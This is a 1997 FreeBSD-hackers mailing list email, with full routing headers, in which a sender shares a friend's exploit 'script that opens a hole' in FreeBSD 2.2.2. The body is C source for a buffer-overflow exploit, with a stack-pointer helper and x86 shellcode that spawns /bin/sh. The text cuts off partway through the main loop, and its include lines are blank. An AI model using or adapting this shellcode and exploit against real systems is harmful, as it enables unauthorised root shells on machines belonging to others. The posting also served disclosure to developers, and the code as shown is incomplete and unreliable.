From owner-freebsd-hackers Mon Aug 4 08:11:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA05049 for hackers-outgoing; Mon, 4 Aug 1997 08:11:46 -0700 (PDT) Received: from server.netplus.com.br (root@[200.247.23.97]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA05040 for ; Mon, 4 Aug 1997 08:11:39 -0700 (PDT) Received: from sergio.lenzi (dial11.netplus [192.168.9.18]) by server.netplus.com.br (8.8.5/8.8.5) with ESMTP id MAA23708 for ; Mon, 4 Aug 1997 12:13:21 GMT Received: from localhost (lenzi@localhost) by sergio.lenzi (8.8.5/8.8.5) with SMTP id KAA06331 for ; Mon, 4 Aug 1997 10:12:20 GMT X-Authentication-Warning: sergio.lenzi: lenzi owned process doing -bs Date: Mon, 4 Aug 1997 10:12:18 +0000 (GMT) From: "Lenzi, Sergio" X-Sender: lenzi@sergio To: hackers@freebsd.org Subject: Security hole script. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-hackers@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello all. Here is the "script" that opens a hole in our FreeBSD 2.2.2... from a friend of mine (lgarcia@netlan.com.br) ---------------------------cut------------------------------- #include #include #include #define BUFFER_SIZE 1400 #define OFFSET 600 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i